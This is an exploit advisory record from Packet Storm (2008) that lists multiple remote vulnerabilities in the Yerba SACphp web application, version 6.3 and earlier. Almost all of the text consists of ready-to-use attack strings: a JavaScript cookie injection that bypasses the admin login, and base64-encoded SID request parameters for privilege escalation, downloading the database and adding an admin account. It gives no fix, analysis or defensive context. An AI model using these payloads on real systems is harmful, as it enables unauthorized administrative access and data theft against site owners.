yerba-multi.txt

2008-10-07T00:00:00
ID PACKETSTORM:70684
Type packetstorm
Reporter StAkeR
Modified 2008-10-07T00:00:00

Description

                                        
                                            ` [*]~======================================================~[*]   
[*] Yerba SACphp <= 6.3 Multiple Remote Vulnerabilities [*]  
[*]~======================================================~[*]  
  
[?] Discovered By StAkeR - StAkeR[at]hotmail[dot]it  
[?] Discovered On 07/10/2008  
[?] http://downloads.sourceforge.net/yerba/SACphp-6_28.tgz?modtime=1025222400&big_mirror=0  
  
[?] Admin Login ByPass  
[?] javascript:document.cookie="galleta[sesion]=MToxOkFkbWluaXN0cmFkb3IgZGVsIFNpc3RlbWE6Jw=="  
  
[?] Privilege Escalation   
[?] index.php?SID=[path (base64 encoded)]  
  
[?] Arbitrary Database Download  
[?] index.php?SID=Jm9kbGFwc2VyPXhmJmFtZXRzaXM9cG9tJm5pbWRBQkR5PWRvbQ==  
  
[?] Arbitrary Add Admin   
[?] index.php?SID=JnJhZ2VyZ2E9eGYmYW1ldHNpcz1wb20mc29pcmF1c1V5PWRvbQ==  
  
  
`